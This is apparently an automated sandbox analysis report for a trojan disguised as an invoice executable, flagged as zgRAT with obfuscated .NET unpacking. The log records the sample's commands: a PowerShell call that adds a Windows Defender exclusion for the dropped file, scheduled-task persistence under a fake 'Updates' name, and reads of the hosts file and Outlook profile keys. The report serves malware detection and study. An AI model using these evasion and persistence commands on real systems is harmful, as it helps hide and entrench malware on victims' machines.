                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comiona
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.386928424.0000000005DC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comttco
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398030415.0000000001607000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363243179.0000000005DCD000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.363307593.0000000005DD2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/t-F
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.363028287.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cnhtn
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DD5000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.360854011.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360864782.0000000005DDB000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.360830990.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.360891857.0000000005DDB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.compew
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.403738185.0000000006ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                Source: unknownDNS traffic detected: queries for: mail.gimpex-imerys.com
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.396629215.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects zgRAT Author: ditekSHen
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 5.2.txQleCu.exe.4561c18.7.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 12.2.txQleCu.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.4561c18.7.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.45389f8.4.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.45389f8.4.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 5.2.txQleCu.exe.450b5d8.3.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40a93e0.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: MSIL_SUSP_OBFUSC_XorStringsNet author = dr4k0nia, description = Detects XorStringsNET string encryption, and other obfuscators derived from it, score = 26/03/2023, version = 1.0, reference = https://github.com/dr4k0nia/yara-rules
                Source: 0.2.INVOICE_NO._29998172.exe.40d2600.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_05356E100_2_05356E10
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_05356E000_2_05356E00
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D6A080_2_0A6D6A08
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D80180_2_0A6D8018
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D69F80_2_0A6D69F8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D00400_2_0A6D0040
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D00120_2_0A6D0012
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D9FD80_2_0A6D9FD8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 0_2_0A6D1D850_2_0A6D1D85
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196F0C05_2_0196F0C0
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196B1B45_2_0196B1B4
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196DA105_2_0196DA10
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196DA205_2_0196DA20
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_05806E105_2_05806E10
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_05806E005_2_05806E00
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB6A085_2_0AAB6A08
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB80185_2_0AAB8018
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB6A075_2_0AAB6A07
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AABA2F05_2_0AABA2F0
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB003F5_2_0AAB003F
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB00405_2_0AAB0040
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0AAB1D855_2_0AAB1D85
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3C8F86_2_02E3C8F8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3A9386_2_02E3A938
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E39D206_2_02E39D20
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3A0686_2_02E3A068
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E359D86_2_02E359D8
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C96806_2_062C9680
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C40206_2_062C4020
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C2C316_2_062C2C31
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C66386_2_062C6638
                Source: INVOICE_NO._29998172.exe, 00000000.00000000.358217407.0000000000A72000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenametSku.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename848e54a8-d802-4186-a62a-e43bdbd99dfb.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.399658088.000000000407C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.398102973.0000000002EB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename848e54a8-d802-4186-a62a-e43bdbd99dfb.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.406572369.00000000075F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRegive.dll4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000000.00000002.396629215.0000000001168000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627240721.000000000104A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exe, 00000006.00000002.627137517.0000000000EF8000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeBinary or memory string: OriginalFilenametSku.exe4 vs INVOICE_NO._29998172.exe
                Source: INVOICE_NO._29998172.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: txQleCu.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: INVOICE_NO._29998172.exeReversingLabs: Detection: 25%
                Source: INVOICE_NO._29998172.exeVirustotal: Detection: 34%
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Users\user\Desktop\INVOICE_NO._29998172.exeJump to behavior
                Source: INVOICE_NO._29998172.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exe
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmp
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exe
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmpJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Users\user\Desktop\INVOICE_NO._29998172.exe C:\Users\user\Desktop\INVOICE_NO._29998172.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmp3339.tmpJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeProcess created: C:\Users\user\AppData\Roaming\txQleCu.exe C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Roaming\txQleCu.exeJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Local\Temp\tmpEB82.tmpJump to behavior
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@15/9@4/2
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: INVOICE_NO._29998172.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6376:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_01
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7084:120:WilError_01
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeMutant created: \Sessions\1\BaseNamedObjects\XnqqSrOjyYQnupRuSLWCZVFSe
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367109894.0000000005DCD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ing.slnt
                Source: INVOICE_NO._29998172.exe, 00000000.00000003.367013515.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.367056781.0000000005DD1000.00000004.00000020.00020000.00000000.sdmp, INVOICE_NO._29998172.exe, 00000000.00000003.366997958.0000000005DD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: rtising.slnt
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: INVOICE_NO._29998172.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: INVOICE_NO._29998172.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: INVOICE_NO._29998172.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: tSku.pdb source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr
                Source: Binary string: tSku.pdbSHA256[ source: INVOICE_NO._29998172.exe, txQleCu.exe.0.dr

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: INVOICE_NO._29998172.exe, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: txQleCu.exe.0.dr, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: 0.0.INVOICE_NO._29998172.exe.a70000.0.unpack, DekkerProject/FormMain.cs.Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                Source: C:\Users\user\AppData\Roaming\txQleCu.exeCode function: 5_2_0196E760 pushfd ; ret 5_2_0196E779
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_02E3DA3B pushfd ; ret 6_2_02E3DA41
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeCode function: 6_2_062C7978 pushad ; ret 6_2_062C7981
                Source: initial sampleStatic PE information: section name: .text entropy: 7.762983884529855
                Source: initial sampleStatic PE information: section name: .text entropy: 7.762983884529855
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeFile created: C:\Users\user\AppData\Roaming\txQleCu.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\txQleCu" /XML "C:\Users\user\AppData\Local\Temp\tmpEB82.tmp
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\INVOICE_NO._29998172.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
